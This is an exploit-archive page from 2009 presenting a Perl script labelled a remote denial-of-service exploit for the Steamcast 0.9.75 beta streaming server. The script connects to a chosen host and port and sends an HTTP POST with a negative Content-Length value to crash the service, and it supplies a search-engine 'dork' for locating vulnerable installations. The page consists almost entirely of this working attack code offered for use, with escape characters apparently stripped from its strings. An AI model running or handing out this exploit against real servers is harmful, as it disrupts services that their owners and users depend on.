[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Steamcast 0.9.75b Remote Denial of Service Exploit
# Published : 2009-04-14
# Author : ksa04
# Previous Title : Zervit Webserver 0.02 Remote Buffer Overflow PoC
# Next Title : OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit
#!/usr/bin/perl
#Steamcast 0.9.75 beta Remote Denial of Service
#Download :http://www.steamcast.com
#Tested Under Windows XP and linux
#Dork for test :"Powered By Steamcast "0.9.75 beta
#Author: ksa04
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "usage: perl $0 host portn";
my $port = shift ;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp')
or die "error: $!n";
$sock->send("POST / HTTP/1.1rn");
$sock->send("Content-Length: -100rnrn");
$sock->close;
print "[+]Done...n";
# www.Syue.com [2009-04-14]